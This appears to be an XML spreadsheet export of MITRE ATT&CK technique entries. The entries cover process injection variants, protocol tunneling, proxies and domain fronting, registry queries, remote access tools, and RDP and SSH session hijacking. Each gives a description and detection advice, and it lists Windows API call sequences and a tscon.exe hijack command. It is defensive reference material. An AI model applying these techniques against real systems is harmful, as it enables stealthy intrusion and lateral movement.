    <t xml:space="preserve">Adversaries may inject malicious code into process via process doppelgänging in order to evade process-based defenses as well as possibly elevate privileges. Process doppelgänging is a method of executing arbitrary code in the address space of a separate live process. 
Windows Transactional NTFS (TxF) was introduced in Vista as a method to perform safe file operations. (Citation: Microsoft TxF) To ensure data integrity, TxF enables only one transacted handle to write to a file at a given time. Until the write handle transaction is terminated, all other handles are isolated from the writer and may only read the committed version of the file that existed at the time the handle was opened. (Citation: Microsoft Basic TxF Concepts) To avoid corruption, TxF performs an automatic rollback if the system or application fails during a write transaction. (Citation: Microsoft Where to use TxF)
Although deprecated, the TxF application programming interface (API) is still enabled as of Windows 10. (Citation: BlackHat Process Doppelgänging Dec 2017)
Adversaries may abuse TxF to a perform a file-less variation of [Process Injection](https://attack.mitre.org/techniques/T1055). Similar to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012), process doppelgänging involves replacing the memory of a legitimate process, enabling the veiled execution of malicious code that may evade defenses and detection. Process doppelgänging's use of TxF also avoids the use of highly-monitored API functions such as &lt;code&gt;NtUnmapViewOfSection&lt;/code&gt;, &lt;code&gt;VirtualProtectEx&lt;/code&gt;, and &lt;code&gt;SetThreadContext&lt;/code&gt;. (Citation: BlackHat Process Doppelgänging Dec 2017)
Process Doppelgänging is implemented in 4 steps (Citation: BlackHat Process Doppelgänging Dec 2017):
* Transact – Create a TxF transaction using a legitimate executable then overwrite the file with malicious code. These changes will be isolated and only visible within the context of the transaction.
* Load – Create a shared section of memory and load the malicious executable.
* Rollback – Undo changes to original executable, effectively removing malicious code from the file system.
* Animate – Create a process from the tainted section of memory and initiate execution.
This behavior will likely not result in elevated privileges since the injected process was spawned from (and thus inherits the security context) of the injecting process. However, execution via process doppelgänging may evade detection from security products since the execution is masked under a legitimate process. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1055/013</t>
  </si>
  <si>
    <t>Monitor and analyze calls to &lt;code&gt;CreateTransaction&lt;/code&gt;, &lt;code&gt;CreateFileTransacted&lt;/code&gt;, &lt;code&gt;RollbackTransaction&lt;/code&gt;, and other rarely used functions indicative of TxF activity. Process Doppelgänging also invokes an outdated and undocumented implementation of the Windows process loader via calls to &lt;code&gt;NtCreateProcessEx&lt;/code&gt; and &lt;code&gt;NtCreateThreadEx&lt;/code&gt; as well as API calls used to modify memory within another process, such as &lt;code&gt;WriteProcessMemory&lt;/code&gt;. (Citation: BlackHat Process Doppelgänging Dec 2017) (Citation: hasherezade Process Doppelgänging Dec 2017)
Scan file objects reported during the PsSetCreateProcessNotifyRoutine, (Citation: Microsoft PsSetCreateProcessNotifyRoutine routine) which triggers a callback whenever a process is created or deleted, specifically looking for file objects with enabled write access. (Citation: BlackHat Process Doppelgänging Dec 2017) Also consider comparing file objects loaded in memory to the corresponding file on disk. (Citation: hasherezade Process Doppelgänging Dec 2017)
Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior.</t>
  </si>
  <si>
    <t>File: File Metadata, Process: OS API Execution</t>
  </si>
  <si>
    <t>T1055.012</t>
  </si>
  <si>
    <t>Process Injection: Process Hollowing</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may inject malicious code into suspended and hollowed processes in order to evade process-based defenses. Process hollowing is a method of executing arbitrary code in the address space of a separate live process.  
Process hollowing is commonly performed by creating a process in a suspended state then unmapping/hollowing its memory, which can then be replaced with malicious code. A victim process can be created with native Windows API calls such as &lt;code&gt;CreateProcess&lt;/code&gt;, which includes a flag to suspend the processes primary thread. At this point the process can be unmapped using APIs calls such as &lt;code&gt;ZwUnmapViewOfSection&lt;/code&gt; or &lt;code&gt;NtUnmapViewOfSection&lt;/code&gt;  before being written to, realigned to the injected code, and resumed via &lt;code&gt;VirtualAllocEx&lt;/code&gt;, &lt;code&gt;WriteProcessMemory&lt;/code&gt;, &lt;code&gt;SetThreadContext&lt;/code&gt;, then &lt;code&gt;ResumeThread&lt;/code&gt; respectively.(Citation: Leitch Hollowing)(Citation: Elastic Process Injection July 2017)
This is very similar to [Thread Local Storage](https://attack.mitre.org/techniques/T1055/005) but creates a new process rather than targeting an existing process. This behavior will likely not result in elevated privileges since the injected process was spawned from (and thus inherits the security context) of the injecting process. However, execution via process hollowing may also evade detection from security products since the execution is masked under a legitimate process. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1055/012</t>
  </si>
  <si>
    <t xml:space="preserve">Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as &lt;code&gt;CreateRemoteThread&lt;/code&gt;, &lt;code&gt;SuspendThread&lt;/code&gt;/&lt;code&gt;SetThreadContext&lt;/code&gt;/&lt;code&gt;ResumeThread&lt;/code&gt;, and those that can be used to modify memory within another process, such as &lt;code&gt;VirtualAllocEx&lt;/code&gt;/&lt;code&gt;WriteProcessMemory&lt;/code&gt;, may be used for this technique.(Citation: Elastic Process Injection July 2017)
Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. </t>
  </si>
  <si>
    <t>T1055.008</t>
  </si>
  <si>
    <t>Process Injection: Ptrace System Calls</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may inject malicious code into processes via ptrace (process trace) system calls in order to evade process-based defenses as well as possibly elevate privileges. Ptrace system call injection is a method of executing arbitrary code in the address space of a separate live process. 
Ptrace system call injection involves attaching to and modifying a running process. The ptrace system call enables a debugging process to observe and control another process (and each individual thread), including changing memory and register values.(Citation: PTRACE man) Ptrace system call injection is commonly performed by writing arbitrary code into a running process (ex: &lt;code&gt;malloc&lt;/code&gt;) then invoking that memory with &lt;code&gt;PTRACE_SETREGS&lt;/code&gt; to set the register containing the next instruction to execute. Ptrace system call injection can also be done with &lt;code&gt;PTRACE_POKETEXT&lt;/code&gt;/&lt;code&gt;PTRACE_POKEDATA&lt;/code&gt;, which copy data to a specific address in the target processes’ memory (ex: the current address of the next instruction). (Citation: PTRACE man)(Citation: Medium Ptrace JUL 2018) 
Ptrace system call injection may not be possible targeting processes with high-privileges, and on some system those that are non-child processes.(Citation: BH Linux Inject) 
Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via ptrace system call injection may also evade detection from security products since the execution is masked under a legitimate process. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1055/008</t>
  </si>
  <si>
    <t xml:space="preserve">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</si>
  <si>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T1055.003</t>
  </si>
  <si>
    <t>Process Injection: Thread Execution Hijacking</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may inject malicious code into hijacked processes in order to evade process-based defenses as well as possibly elevate privileges. Thread Execution Hijacking is a method of executing arbitrary code in the address space of a separate live process. 
Thread Execution Hijacking is commonly performed by suspending an existing process then unmapping/hollowing its memory, which can then be replaced with malicious code or the path to a DLL. A handle to an existing victim process is first created with native Windows API calls such as &lt;code&gt;OpenThread&lt;/code&gt;. At this point the process can be suspended then written to, realigned to the injected code, and resumed via &lt;code&gt;SuspendThread &lt;/code&gt;, &lt;code&gt;VirtualAllocEx&lt;/code&gt;, &lt;code&gt;WriteProcessMemory&lt;/code&gt;, &lt;code&gt;SetThreadContext&lt;/code&gt;, then &lt;code&gt;ResumeThread&lt;/code&gt; respectively.(Citation: Elastic Process Injection July 2017)
This is very similar to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012) but targets an existing process rather than creating a process in a suspended state.  
Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via Thread Execution Hijacking may also evade detection from security products since the execution is masked under a legitimate process. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1055/003</t>
  </si>
  <si>
    <t>T1055.005</t>
  </si>
  <si>
    <t>Process Injection: Thread Local Storage</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may inject malicious code into processes via thread local storage (TLS) callbacks in order to evade process-based defenses as well as possibly elevate privileges. TLS callback injection is a method of executing arbitrary code in the address space of a separate live process. 
TLS callback injection involves manipulating pointers inside a portable executable (PE) to redirect a process to malicious code before reaching the code's legitimate entry point. TLS callbacks are normally used by the OS to setup and/or cleanup data used by threads. Manipulating TLS callbacks may be performed by allocating and writing to specific offsets within a process’ memory space using other [Process Injection](https://attack.mitre.org/techniques/T1055) techniques such as [Process Hollowing](https://attack.mitre.org/techniques/T1055/012).(Citation: FireEye TLS Nov 2017)
Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via TLS callback injection may also evade detection from security products since the execution is masked under a legitimate process. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1055/005</t>
  </si>
  <si>
    <t>T1055.014</t>
  </si>
  <si>
    <t>Process Injection: VDSO Hijacking</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may inject malicious code into processes via VDSO hijacking in order to evade process-based defenses as well as possibly elevate privileges. Virtual dynamic shared object (vdso) hijacking is a method of executing arbitrary code in the address space of a separate live process. 
VDSO hijacking involves redirecting calls to dynamically linked shared libraries. Memory protections may prevent writing executable code to a process via [Ptrace System Calls](https://attack.mitre.org/techniques/T1055/008). However, an adversary may hijack the syscall interface code stubs mapped into a process from the vdso shared object to execute syscalls to open and map a malicious shared object. This code can then be invoked by redirecting the execution flow of the process via patched memory address references stored in a process' global offset table (which store absolute addresses of mapped library functions).(Citation: ELF Injection May 2009) (Citation: Backtrace VDSO) (Citation: VDSO Aug 2005) (Citation: Syscall 2014)
Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via VDSO hijacking may also evade detection from security products since the execution is masked under a legitimate process.  </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1055/014</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for malicious usage of system calls, such as ptrace and mmap, that can be used to attach to, manipulate memory, then redirect a processes' execution path. Monitoring for Linux specific calls such as the ptrace system call should not generate large amounts of data due to their specialized nature, and can be a very effective method to detect some of the common process injection methods.(Citation: ArtOfMemoryForensics)  (Citation: GNU Acct)  (Citation: RHEL auditd)  (Citation: Chokepoint preload rootkits) 
Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. </t>
  </si>
  <si>
    <t>T1572</t>
  </si>
  <si>
    <t>Protocol Tunneling</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may tunnel network communications to and from a victim system within a separate protocol to avoid detection/network filtering and/or enable access to otherwise unreachable systems. Tunneling involves explicitly encapsulating a protocol within another. This behavior may conceal malicious traffic by blending in with existing traffic and/or provide an outer layer of encryption (similar to a VPN). Tunneling could also enable routing of network packets that would otherwise not reach their intended destination, such as SMB, RDP, or other traffic that would be filtered by network appliances or not routed over the Internet. 
There are various means to encapsulate a protocol within another protocol. For example, adversaries may perform SSH tunneling (also known as SSH port forwarding), which involves forwarding arbitrary data over an encrypted SSH tunnel.(Citation: SSH Tunneling) 
[Protocol Tunneling](https://attack.mitre.org/techniques/T1572) may also be abused by adversaries during [Dynamic Resolution](https://attack.mitre.org/techniques/T1568). Known as DNS over HTTPS (DoH), queries to resolve C2 infrastructure may be encapsulated within encrypted HTTPS packets.(Citation: BleepingComp Godlua JUL19) 
Adversaries may also leverage [Protocol Tunneling](https://attack.mitre.org/techniques/T1572) in conjunction with [Proxy](https://attack.mitre.org/techniques/T1090) and/or [Protocol Impersonation](https://attack.mitre.org/techniques/T1001/003) to further conceal C2 communications and infrastructure. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1572</t>
  </si>
  <si>
    <t>Monitoring for systems listening and/or establishing external connections using ports/protocols commonly associated with tunneling, such as SSH (port 22). Also monitor for processes commonly associated with tunneling, such as Plink and the OpenSSH client.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standards regarding syntax, structure, or any other variable adversaries could leverage to conceal data.(Citation: University of Birmingham C2)</t>
  </si>
  <si>
    <t>T1090</t>
  </si>
  <si>
    <t>Proxy</t>
  </si>
  <si>
    <t>Adversaries may use a connection proxy to direct network traffic between systems or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reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.
Adversaries can also take advantage of routing schemes in Content Delivery Networks (CDNs) to proxy command and control traffic.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1090</t>
  </si>
  <si>
    <t>Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server or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 (Citation: University of Birmingham C2)
Consider monitoring for traffic to known anonymity networks (such as [Tor](https://attack.mitre.org/software/S0183)).</t>
  </si>
  <si>
    <t>Brian Prange; Heather Linn; Walker Johnson</t>
  </si>
  <si>
    <t>T1090.004</t>
  </si>
  <si>
    <t>Proxy: Domain Fronting</t>
  </si>
  <si>
    <t>Adversaries may take advantage of routing schemes in Content Delivery Networks (CDNs) and other services which host multiple domains to obfuscate the intended destination of HTTPS traffic or traffic tunneled through HTTPS. (Citation: Fifield Blocking Resistent Communication through domain fronting 2015) Domain fronting involves using different domain names in the SNI field of the TLS header and the Host field of the HTTP header. If both domains are served from the same CDN, then the CDN may route to the address specified in the HTTP header after unwrapping the TLS header. A variation of the the technique, "domainless" fronting, utilizes a SNI field that is left blank; this may allow the fronting to work even when the CDN attempts to validate that the SNI and HTTP Host fields match (if the blank SNI fields are ignored).
For example, if domain-x and domain-y are customers of the same CDN, it is possible to place domain-x in the TLS header and domain-y in the HTTP header. Traffic will appear to be going to domain-x, however the CDN may route it to domain-y.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1090/004</t>
  </si>
  <si>
    <t>If SSL inspection is in place or the traffic is not encrypted, the Host field of the HTTP header can be checked if it matches the HTTPS SNI or against a blocklist or allowlist of domain names. (Citation: Fifield Blocking Resistent Communication through domain fronting 2015)</t>
  </si>
  <si>
    <t>Matt Kelly, @breakersall</t>
  </si>
  <si>
    <t>T1090.002</t>
  </si>
  <si>
    <t>Proxy: External Proxy</t>
  </si>
  <si>
    <t>Adversaries may use an external proxy to act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths to avoid suspicion.
External connection proxies are used to mask the destination of C2 traffic and are typically implemented with port redirectors. Compromised systems outside of the victim environment may be used for these purposes, as well as purchased infrastructure such as cloud-based resources or virtual private servers. Proxies may be chosen based on the low likelihood that a connection to them from a compromised system would be investigated. Victim systems would communicate directly with the external proxy on the Internet and then the proxy would forward communications to the C2 server.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1090/002</t>
  </si>
  <si>
    <t>Analyze network data for uncommon data flows, such as a client sending significantly more data than it receives from an external server.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</si>
  <si>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T1090.001</t>
  </si>
  <si>
    <t>Proxy: Internal Proxy</t>
  </si>
  <si>
    <t>Adversaries may use an internal proxy to direct command and control traffic between two or more systems in a compromised environment. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use internal proxies to manage command and control communications inside a compromised environment, to reduce the number of simultaneous outbound network connections, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between infected systems to avoid suspicion. Internal proxy connections may use common peer-to-peer (p2p) networking protocols, such as SMB, to better blend in with the environment.
By using a compromised internal system as a proxy, adversaries may conceal the true destination of C2 traffic while reducing the need for numerous connections to external systems.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1090/001</t>
  </si>
  <si>
    <t>Analyze network data for uncommon data flows between clients that should not or often do not communicate with one another. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)</t>
  </si>
  <si>
    <t>T1090.003</t>
  </si>
  <si>
    <t>Proxy: Multi-hop Proxy</t>
  </si>
  <si>
    <t>To disguise the source of malicious traffic, adversaries may chain together multiple proxies. Typically, a defender will be able to identify the last proxy traffic traversed before it enters their network; the defender may or may not be able to identify any previous proxies before the last-hop proxy. This technique makes identifying the original source of the malicious traffic even more difficult by requiring the defender to trace malicious traffic through several proxies to identify its source. A particular variant of this behavior is to use onion routing networks, such as the publicly available TOR network. (Citation: Onion Routing)
In the case of network infrastructure, particularly routers, it is possible for an adversary to leverage multiple compromised devices to create a multi-hop proxy chain within the Wide-Area Network (WAN) of the enterprise.  By leveraging [Patch System Image](https://attack.mitre.org/techniques/T1601/001), adversaries can add custom code to the affected network devices that will implement onion routing between those nodes.  This custom onion routing network will transport the encrypted C2 traffic through the compromised population, allowing adversaries to communicate with any device within the onion routing network.  This method is dependent upon the [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599) method in order to allow the adversaries to cross the protected network boundary of the Internet perimeter and into the organization’s WAN. Protocols such as ICMP may be used as a transport.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1090/003</t>
  </si>
  <si>
    <t>When observing use of Multi-hop proxies, network data from the actual command and control servers could allow correlating incoming and outgoing flows to trace malicious traffic back to its source. Multi-hop proxies can also be detected by alerting on traffic to known anonymity networks (such as [Tor](https://attack.mitre.org/software/S0183)) or known adversary infrastructure that uses this technique.
In context of network devices, monitor traffic for encrypted communications from the Internet that is addressed to border routers.  Compare this traffic with the configuration to determine whether it matches with any configured site-to-site Virtual Private Network (VPN) connections the device was intended to have. Monitor traffic for encrypted communications originating from potentially breached routers that is addressed to other routers within the organization.  Compare the source and destination with the configuration of the device to determine if these channels are an authorized Virtual Private Network (VPN) connections or other encrypted modes of communication. Monitor ICMP traffic from the Internet that is addressed to border routers and is encrypted.  Few if any legitimate use cases exist for sending encrypted data to a network device via ICMP.</t>
  </si>
  <si>
    <t>T1012</t>
  </si>
  <si>
    <t>Query Registry</t>
  </si>
  <si>
    <t>Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
The Registry contains a significant amount of information about the operating system, configuration, software, and security.(Citation: Wikipedia Windows Registry) Information can easily be queried using the [Reg](https://attack.mitre.org/software/S0075) utility, though other means to access the Registry exist. Some of the information may help adversaries to further their operation within a network. Adversaries may use the information from [Query Registry](https://attack.mitre.org/techniques/T1012) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1012</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</si>
  <si>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Interaction with the Windows Registry may come from the command line using utilities such as [Reg](https://attack.mitre.org/software/S0075) or through running malware that may interact with the Registry through an API. Command-line invocation of utilities used to query the Registry may be detected through process and command-line monitoring.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</si>
  <si>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Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access</t>
  </si>
  <si>
    <t>T1219</t>
  </si>
  <si>
    <t>Remote Access Software</t>
  </si>
  <si>
    <t>An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
Remote access tools may be established and used post-compromise as alternate communications channel for redundant access or as a way to establish an interactive remote desktop session with the target system. They may also be used as a component of malware to establish a reverse connection or back-connect to a service or adversary controlled system.
Admin tools such as TeamViewer have been used by several groups targeting institutions in countries of interest to the Russian state and criminal campaigns. (Citation: CrowdStrike 2015 Global Threat Report) (Citation: CrySyS Blog TeamSpy)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1219</t>
  </si>
  <si>
    <t>Monitor for applications and processes related to remote admin tools. Correlate activity with other suspicious behavior that may reduce false positives if these tools are used by legitimate users and administrators.
Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol for the port that is being used.
[Domain Fronting](https://attack.mitre.org/techniques/T1090/004) may be used in conjunction to avoid defenses. Adversaries will likely need to deploy and/or install these remote tools to compromised systems. It may be possible to detect or prevent the installation of these tools with host-based solutions.</t>
  </si>
  <si>
    <t>Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: Process Creation</t>
  </si>
  <si>
    <t>T1563</t>
  </si>
  <si>
    <t>Remote Service Session Hijacking</t>
  </si>
  <si>
    <t>Adversaries may take control of preexisting sessions with remote services to move laterally in an environment. Users may use valid credentials to log into a service specifically designed to accept remote connections, such as telnet, SSH, and RDP. When a user logs into a service, a session will be established that will allow them to maintain a continuous interaction with that service.
Adversaries may commandeer these sessions to carry out actions on remote systems. [Remote Service Session Hijacking](https://attack.mitre.org/techniques/T1563) differs from use of [Remote Services](https://attack.mitre.org/techniques/T1021) because it hijacks an existing session rather than creating a new session using [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: RDP Hijacking Medium)(Citation: Breach Post-mortem SSH Hijack)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1563</t>
  </si>
  <si>
    <t>25 February 2020</t>
  </si>
  <si>
    <t>Use of these services may be legitimate, depending upon the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with that service. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time.
Monitor for processes and command-line arguments associated with hijacking service sessions.</t>
  </si>
  <si>
    <t>Command: Command Execution, Logon Session: Logon Session Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: Process Creation</t>
  </si>
  <si>
    <t>T1563.002</t>
  </si>
  <si>
    <t>Remote Service Session Hijacking: RDP Hijacking</t>
  </si>
  <si>
    <t>Adversaries may hijack a legitimate user’s remote desktop session to move laterally within an environment.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perform RDP session hijacking which involves stealing a legitimate user's remote session. Typically, a user is notified when someone else is trying to steal their session. With System permissions and using Terminal Services Console, `c:\windows\system32\tscon.exe [session number to be stolen]`, an adversary can hijack a session without the need for credentials or prompts to the user.(Citation: RDP Hijacking Korznikov) This can be done remotely or locally and with active or disconnected sessions.(Citation: RDP Hijacking Medium) It can also lead to [Remote System Discovery](https://attack.mitre.org/techniques/T1018) and Privilege Escalation by stealing a Domain Admin or higher privileged account session. All of this can be done by using native Windows commands, but it has also been added as a feature in red teaming tools.(Citation: Kali Redsnarf)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1563/002</t>
  </si>
  <si>
    <t>Consider monitoring processes for `tscon.exe` usage and monitor service creation that uses `cmd.exe /k` or `cmd.exe /c` in its arguments to detect RDP session hijacking.
Use of RDP may be legitimate, depending on the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with RDP.</t>
  </si>
  <si>
    <t>T1563.001</t>
  </si>
  <si>
    <t>Remote Service Session Hijacking: SSH Hijacking</t>
  </si>
  <si>
    <t>Adversaries may hijack a legitimate user's SSH session to move laterally within an environment. Secure Shell (SSH) is a standard means of remote access on Linux and macOS systems. It allows a user to connect to another system via an encrypted tunnel, commonly authenticating through a password, certificate or the use of an asymmetric encryption key pair.
In order to move laterally from a compromised host, adversaries may take advantage of trust relationships established with other systems via public key authentication in active SSH sessions by hijacking an existing connection to another system. This may occur through compromising the SSH agent itself or by having access to the agent's socket. If an adversary is able to obtain root access, then hijacking SSH sessions is likely trivial.(Citation: Slideshare Abusing SSH)(Citation: SSHjack Blackhat)(Citation: Clockwork SSH Agent Hijacking)(Citation: Breach Post-mortem SSH Hijack)
[SSH Hijacking](https://attack.mitre.org/techniques/T1563/001) differs from use of [SSH](https://attack.mitre.org/techniques/T1021/004) because it hijacks an existing SSH session rather than creating a new session using [Valid Accounts](https://attack.mitre.org/techniques/T1078).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1563/001</t>
  </si>
  <si>
    <t>Use of SSH may be legitimate, depending upon the network environment and how it is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 Also monitor user SSH-agent socket files being used by different users.</t>
  </si>
  <si>
    <t>Anastasios Pingios</t>
  </si>
  <si>
    <t>T1021</t>
  </si>
  <si>
    <t>Remote Services</t>
  </si>
  <si>
    <t>Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a service specifically designed to accept remote connections, such as telnet, SSH, and VNC. The adversary may then perform actions as the logged-on user.
In an enterprise environment, servers and workstations can be organized into domains. Domains provide centralized identity management, allowing users to login using one set of credentials across the entire network. If an adversary is able to obtain a set of valid domain credentials, they could login to many different machines using remote access protocols such as secure shell (SSH) or remote desktop protocol (RDP).(Citation: SSH Secure Shell)(Citation: TechNet Remote Desktop Services)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1021</t>
  </si>
  <si>
    <t>Correlate use of login activity related to remote services with unusual behavior or other malicious or suspicious activity. Adversaries will likely need to learn about an environment and the relationships between systems through Discovery techniques prior to attempting Lateral Movement.</t>
  </si>
  <si>
    <t>Command: Command Execution, Logon Session: Logon Session Creation, Module: Module Load, Network Share: Network Share Access, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Flow, Process: Process Creation</t>
  </si>
  <si>
    <t>T1021.003</t>
  </si>
  <si>
    <t>Remote Services: Distributed Component Object Model</t>
  </si>
  <si>
    <t>Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote machines by taking advantage of Distributed Component Object Model (DCOM). The adversary may then perform actions as the logged-on user.
The Windows Component Object Model (COM) is a component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces. Through COM, a client object can call methods of server objects, which are typically Dynamic Link Libraries (DLL) or executables (EXE). Distributed COM (DCOM) is transparent middleware that extends the functionality of COM beyond a local computer using remote procedure call (RPC) technology.(Citation: Fireeye Hunting COM June 2019)(Citation: Microsoft COM)
Permissions to interact with local and remote server COM objects are specified by access control lists (ACL) in the Registry.(Citation: Microsoft Process Wide Com Keys) By default, only Administrators may remotely activate and launch COM objects through DCOM.(Citation: Microsoft COM ACL)
Through DCOM, adversaries operating in the context of an appropriately privileged user can remotely obtain arbitrary and even direct shellcode execution through Office applications(Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) as well as other Windows objects that contain insecure methods.(Citation: Enigma MMC20 COM Jan 2017)(Citation: Enigma DCOM Lateral Movement Jan 2017) DCOM can also execute macros in existing documents(Citation: Enigma Excel DCOM Sept 2017) and may also invoke Dynamic Data Exchange (DDE) execution directly through a COM created instance of a Microsoft Office application(Citation: Cyberreason DCOM DDE Lateral Movement Nov 2017), bypassing the need for a malicious document.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1021/003</t>
  </si>
  <si>
    <t>Monitor for COM objects loading DLLs and other modules not typically associated with the application.(Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) Enumeration of COM objects, via [Query Registry](https://attack.mitre.org/techniques/T1012) or [PowerShell](https://attack.mitre.org/techniques/T1059/001), may also proceed malicious use.(Citation: Fireeye Hunting COM June 2019)(Citation: Enigma MMC20 COM Jan 2017) Monitor for spawning of processes associated with COM objects, especially those invoked by a user different than the one currently logged on.
Monitor for any influxes or abnormal increases in Distributed Computing Environment/Remote Procedure Call (DCE/RPC) traffic.</t>
  </si>
  <si>
    <t>Module: Module Load, Network Traffic: Network Connection Creation, Process: Process Creation</t>
  </si>
  <si>
    <t>T1021.001</t>
  </si>
  <si>
    <t>Remote Services: Remote Desktop Protocol</t>
  </si>
  <si>
    <t>Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.
Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).(Citation: TechNet Remote Desktop Services) 
Adversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials. Adversaries will likely use Credential Access techniques to acquire credentials to use with RDP. Adversaries may also use RDP in conjunction with the [Accessibility Features](https://attack.mitre.org/techniques/T1546/008) technique for Persistence.(Citation: Alperovitch Malware)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1021/001</t>
  </si>
  <si>
    <t>Use of RDP may be legitimate, depending on the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with RDP. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time.</t>
  </si>
  <si>
    <t>Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Flow, Process: Process Creation</t>
  </si>
  <si>
    <t>T1021.002</t>
  </si>
  <si>
    <t>Remote Services: SMB/Windows Admin Shares</t>
  </si>
  <si>
    <t>Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the logged-on user.
SMB is a file, printer, and serial port sharing protocol for Windows machines on the same network or domain. Adversaries may use SMB to interact with file shares, allowing them to move laterally throughout a network. Linux and macOS implementations of SMB typically use Samba.
